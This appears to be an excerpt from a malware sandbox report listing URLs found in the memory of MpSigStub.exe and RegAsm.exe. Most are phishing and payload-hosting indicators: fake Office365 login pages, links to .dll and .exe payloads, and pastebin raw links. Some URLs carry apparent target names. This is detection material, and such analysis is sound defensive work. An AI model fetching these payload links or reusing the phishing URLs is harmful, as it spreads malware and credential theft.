Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: https://kenosis.ml/wp-content/upgrabe/
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://kiki-lo.online/?e=ckomorowski
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://kinzlerimmigration.com/wp_include/redirect/anvsawuuy2fydgvyqhridmmuy29t
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://kiosp.dyndns.dk/icon4/next.php
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://kirimliinsaat.com.tr/ui/office365
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://kod.haohaoda.cn/plugins/picasa/newpo.png
Source: MpSigStub.exe, 00000023.00000003.18327477882.0000015B1B65E000.00000004.00000001.sdmp String found in binary or memory: https://kofiruions.xyz/royal/brand.php
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://koirado.com/vendor/phpunit/phpunit/src/util/php/css/dir/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://konzmny.com/?qs=a9537c1ce6614636144ad0c9e0975ac106bb986006db8f6a0789e5b0d16dcf4fc15476ba5afa
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://koooking.online/webs/
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://kraft.eng.br/
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: https://kurtoch.eu/rgfyzrxlr/ind.html
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://kweraltd.com/wp-content/plugins
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://l%%8Kvfcrl%%8Kvfyptl%%8Kvfoexpert.work/core/venl%%8Kvfl%%8Kvfdor/doctrine/lexer/lib/cpf9PlDn
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://labrie-sabette.com/wp-includes/sodiu
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://lawyersblog.net/777/picture9.dll
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: https://legalproceedings.uc.r.appspot.com/legal_proceeding_concerning_overdue_invoices_pdf.jar
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://limarija-das.hr/wp-content/plugins/wp-optimize/js/handlebars/CJrMovjhM.phpMXynE
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: https://linesburline.at/3/bbc.dll
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: https://linkr.uk/2nuds
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: https://linkr.uk/elgja
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://linkr.uk/fyu5r
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://linkzip.me/
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: https://liquide.co/3qyyerb6gvx/ind.html
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://listoparacomer.com.ve/wp-content/hewlett-packard-mcafee/hpe.html
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://litesound.ml/fax/policy.php
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://livelongerfeelbetter.com/
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: https://livesnoop.com/client/postlog.php
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: https://livesnoop.com/client/screenshots.php
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://lixns.com/xl/?referrer=
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://lmvus.com/omar/90/$8900.doc
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: https://localmonero.co/
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/geolocate?key=test
Source: RegAsm.exe, 00000008.00000002.21905650034.000000001E595000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21910178869.000000001E986000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: RegAsm.exe, 00000008.00000002.21905650034.000000001E595000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: RegAsm.exe, 00000008.00000002.21905650034.000000001E595000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: RegAsm.exe, 00000008.00000002.21905650034.000000001E595000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://login.livevoice365.xyz/
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: https://login.yahoo.com/config/login
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: https://loginmixcrhustim0fficia6.ga/xi/policy.php
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: https://logins.daum.net/accounts/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: https://logins.daum.net/accounts/logout.do?url=http%3A%2F%2Fwww.daum.net%2F%3Fnil_profile%3Dlogout
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://logowrench.website/zdz0ptxdtonla.php
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: https://logs1186.xiti.com/
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: https://logupdate.herokuapp.com
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/ekdnl
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/htyul
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/mccwd
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/tllwu
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/welhl
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://lupoun.com/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://lupoun.com/moon/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: https://m3lloyellow.com/rodrich.php
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://macflypro.com/builds/data/
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://maersoul.com/vix/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: https://mail.daum.net
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: https://mail.daum.net/login?url=http%3A%2F%2Fmail.daum.net%2F
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://mailsending.site/Happy_CS/happyFun.exe
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://main.iam.ad.ext.azure.com/api/
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: https://malsay.myftp.biz/ck/business/index.php
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: https://mamulln.cl/kwi/?email=travis_phillips
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://marcostrombetta.com.br/ds/1802.Dc
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://marcostrombetta.com.br/ds/1802.gif
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://massotherapielg.com/css/acrobat/login.micosoftonline.com/index.html
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://maxizoner.com/presentation.dll
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp String found in binary or memory: https://mazedecrypt.top/
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://md.jp-long.online/?e=robertm
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://md.jp-long.online/?e=vpetrillo
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: https://md.klnmailbox.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://mdhov.ca/storage/mdhov/ca/next.php
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://mdspni.com/realm/send.php
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: https://meant.usa.cc/no/sharpoin/sharpoint/share/
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://media.discordapp.net/attachments/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://mediadigital.site/class-vc.php
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: https://megoseri.com/app.dll%/cvr78f2.tmp.cvr
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://mercados247.com/ds/1602.gif
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://message-read.iosmail-inbox.host/5c36dfff53edaf584b5d9262?qlpq7hq=&amp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: https://meubackup.terra.com.br/index.php/s/4fwo4jtezhqnzdd/download
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://mhjyutrfgf.gb.net/grte544fc3/?vfegg5355=fvvbveg545
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: https://minhafinanca.com/wp-admin/css/colors/coffee/reportexcelindeed
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://minisnowhair.com/minisnw2/download2.php?f=htm-2-ads19u09ue11&u=22fc8bcc-db88-4ca7-9654-81ad4
Source: MpSigStub.exe, 00000023.00000003.18327477882.0000015B1B65E000.00000004.00000001.sdmp String found in binary or memory: https://miscrsftonline.ml/blessing/policy.php
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: https://missglamourcosmeticos.com.br/ds/29.gif
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: https://mjstech1.com/06/lub.php
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: https://mmjobserver.com/aah/next.php
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://moegifts.com/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: https://mollahossein.ir/cgi_bin/bgxlc3rlckblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://mor32.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://moralsss.com/office/office365/index.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://moranmus.com/adobe-vix/
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: https://mort2021.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://msatechnology.com/admincp/wp-admin/css/colors/ectoplasm/reportexcel.php
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://mtonlino.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://mueblesmaple.com.mx/19.gif
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: https://muropronto.ibsweb.com.br/modules/mod_simplefileuploadv1.3/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://mycrotyx.com/cgi.bin/azure2020/realm/send.php
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://myexternalip.com/raw
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://myexternalip.com/rawx
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://mylovelybluesky.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://myoffice365-online.com/login/common/login/mridings
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://myscape.in/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: https://mywebscrap.com/ds/0402.gif
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://mz.ht-aslice.online/?e=a.wirth
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://mz.ht-aslice.online/?e=erdinc.gok
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://mz.ht-aslice.online/?e=mike.platt
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://n9.cl/d9fii
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: https://navigator.fun/wp-content/plugins/refer-a-friend-for-woocommerce-by-wpgens/public/js/mcb8abrb
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://netorgft3012202.sharepoint.com/:b:/s/investments/ewhzfsivbvbdn1vhk8eejpcbnbcaan_xlbd5e7fn2lp
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://neuroconversions.com/wp-content/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://neuroconversions.com/wp-content/plugins/po4/excelz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: https://neverlose.cc/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://newsiest-grid.000webhostapp.com/dhl/dhla/dhl%20auto/index.php?email=kani.junichi
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: https://newtrp.com/e8/rexifly.php
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://newwets.com/zip/document.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://nexustiles.com/y29yaw5uzs5oewxhbmrac2fudgfjcnv6y291bnr5lnvz
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://nhacaiuytin888.com/mail/now.php
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://nicoleiman.com/zmxvcmvuy2lhqhnpbxrly2guys1zdgfylmvkds5zzw==
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://nizarazu.ru/tyui/?activity=4789652
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: https://nonamesv.xsiazon.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://norsecompassgroup.com/4eqmrlzmq9r/lipa.html
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: https://notafiscaleletronica-e.com/master/
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: https://notes.topix21century.com/asp/kys_allow_get.asp?name=getkys.kys
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://novaworld-resort.com/wp-admin/user/delis/ite1/links.doc
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: https://nowfoundation.org.uk/hx0smmmbiw/haurt.html
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://oauth2.googleapis
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: https://objectstorage.uk-london-1.oraclecloud.com/n/lrxg46lu57ma/
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: https://objectstorage.us-ashburn-1.oraclecloud.com/n/idb0azuxzsop/b/viperwee/o/voicee.mp3
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://objectstorage.us-phoenix-1.oraclecloud.com/n/axfwptiilgjl/b/azu/o/vn.html#support
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exe
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exeac
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://oemands.dk/xmlrpc.php
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://office.com/start/myaccount.aspx
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://office.insureusun.com/?e=simona.merzagora
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://office.live.com/start/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: https://office365.club/web/content.dotm
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://ohgstd-adnazad.c9users.io/update/validate/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://oidblueprin.at/3/str.dll
Source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp String found in binary or memory: https://oksearch.org/xa2/click.html
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: https://olisseytravel.az/wp-content/themes/themesnewsa/js/zxz/new.php
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://olympiacus.accesscam.org/pdf/opo.php
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: https://one.co.il
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/download.aspx?cid=7df9938cb8d94df3&authkey=%21ajy8jfax0aqsibs&resid=7df993
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: https://opposedent.com/css/main.css/send.css
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://organigrama.gualda.com
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://ostoja.tk/browser.php
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://ourcomm.co.uk/wp-content/plugins/buddyboss-platfo
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office.com/api/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://ov.m4sh-up1x.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://ozmontelectrical.com/drms/fert.html
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://paf.gov-mail.net/13621/1/18844/2/0/0/1390324815/files-b74d99d6/hta
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://panolinuk-my.sharepoint.com/:b:/g/personal/paul_holland_panolin_co_uk/eewdyq0-yzdfhxzreappqk
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: https://paste.ee/d/n9jsq/0
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://paste.ee/r/26jiy/0
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: https://paste.ee/r/c9fe4/0
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://paste.ee/r/cikn9/0
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/2STTYftz
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/E1MURCfS
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/G0jcGs79
Source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/g10EQ6PS
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp String found in binary or memory: https://pastebinp.com/raw/1Tuj3CF7
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp String found in binary or memory: https://pastebinp.com/raw/itDEZ39X
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://paxful.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://pay.2go.com/payment/2-1301222-qoo1mwri7zqbuxa2)
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://pay.yac.mx
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://pay.yac.mxx:
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://pd.gy-lnoice.online/?e=dskodras
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrgcm7nkd.php
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://peregrineplastics-my.sharepoint.com/:o:/g/personal/bsmith_peregrine_build/erg-sjvfekzmix8xbx
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://petlineir.com/mason/amstream.exe
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://photofinderplus.com/s/?api=
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://picsum.photos/80
